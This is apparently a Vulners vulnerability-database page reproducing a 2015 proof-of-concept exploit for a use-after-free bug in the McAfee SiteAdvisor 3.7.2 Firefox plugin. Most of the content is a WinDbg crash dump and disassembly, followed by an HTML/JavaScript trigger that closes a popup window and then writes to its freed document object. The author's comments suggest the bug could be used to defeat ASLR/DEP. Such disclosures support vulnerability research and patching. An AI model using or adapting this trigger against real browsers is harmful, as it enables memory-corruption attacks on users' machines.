Vulners
Lucene search
McAfee SiteAdvisor 3.7.2 - Firefox Use-After-Free (PoC)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=windows-1250">
<meta name="generator" content="PSPad editor, www.pspad.com">
<title>McAfee SiteAdvisor 3.7.2 for firefox Use After Free Poc</title>
</head>
<body>
<script>
/*
Title: McAfee SiteAdvisor 3.7.2 (firefox) Use After Free
Author: Marcin Ressel
Twitter: https://twitter.com/m_ressel
NPMcFFPlg32.dll
McAfee SiteAdvisor 3.7.2
Tested on: Windows 8.1 (x64) and firefox 38.0.5
Homepage: https://www.siteadvisor.com/
Note: this vlun potentiali give us posibility to bruteforce base modules in memory
to bypass ASLR/DEP because the bug doesn't have negative impact to webbrowser proces
i mean firefox will not crash after trigger uaf i McAfee
0:107> !gflag
Current NtGlobalFlag contents: 0x02001800
htg - Enable heap tagging
ust - Create user mode stack trace database
hpa - Place heap allocations at ends of pages
0:107> g
(1d68.1b54): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=24b9efec ebx=00000000 ecx=00000000 edx=003bf030 esi=1a978ff0 edi=00000001
eip=6f404391 esp=003bf014 ebp=003bf054 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
NPMcFFPlg32!CreateFFScriptable+0x141:
6f404391 8b4008 mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
...
6f40437a 8b02 mov eax,dword ptr [edx]
6f40437c 85c0 test eax,eax
6f40437e 7402 je NPMcFFPlg32!CreateFFScriptable+0x132 (6f404382)
6f404380 8b00 mov eax,dword ptr [eax]
6f404382 8b4808 mov ecx,dword ptr [eax+8]
6f404385 8b4004 mov eax,dword ptr [eax+4]
6f404388 49 dec ecx
6f404389 234a08 and ecx,dword ptr [edx+8]
6f40438c 8b0488 mov eax,dword ptr [eax+ecx*4]
6f40438f 8b00 mov eax,dword ptr [eax]
6f404391 8b4008 mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
6f404394 eb45 jmp NPMcFFPlg32!CreateFFScriptable+0x18b (6f4043db)
6f404396 8d45d0 lea eax,[ebp-30h]
6f404399 50 push eax
6f40439a e8d10e0000 call NPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
6f40439f 8bd0 mov edx,eax
6f4043a1 8b02 mov eax,dword ptr [edx]
6f4043a3 85c0 test eax,eax
6f4043a5 7402 je NPMcFFPlg32!CreateFFScriptable+0x159 (6f4043a9)
6f4043a7 8b00 mov eax,dword ptr [eax]
6f4043a9 8b4808 mov ecx,dword ptr [eax+8]
6f4043ac 8b4004 mov eax,dword ptr [eax+4]
6f4043af 49 dec ecx
6f4043b0 234a08 and ecx,dword ptr [edx+8]
6f4043b3 8b3488 mov esi,dword ptr [eax+ecx*4]
6f4043b6 8d45c4 lea eax,[ebp-3Ch]
6f4043b9 50 push eax
6f4043ba e8b10e0000 call NPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
6f4043bf 8bd0 mov edx,eax
...
*/
var win = null;
function crash()
{
var doc = win.document;
var obj = doc;
win.close();
for(var p in obj)
{
if(typeof obj[p] == 'string')
{
try{ obj[p] = "CCCC"; }catch(err){}
}
}
}
win = window.open('data:text/html,','','width=20,height=20'); //you need disable popupBlocker
win.onload = crash;
</script>
</body>
</html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2015 00:00Current
7.4High risk
Vulners AI Score7.4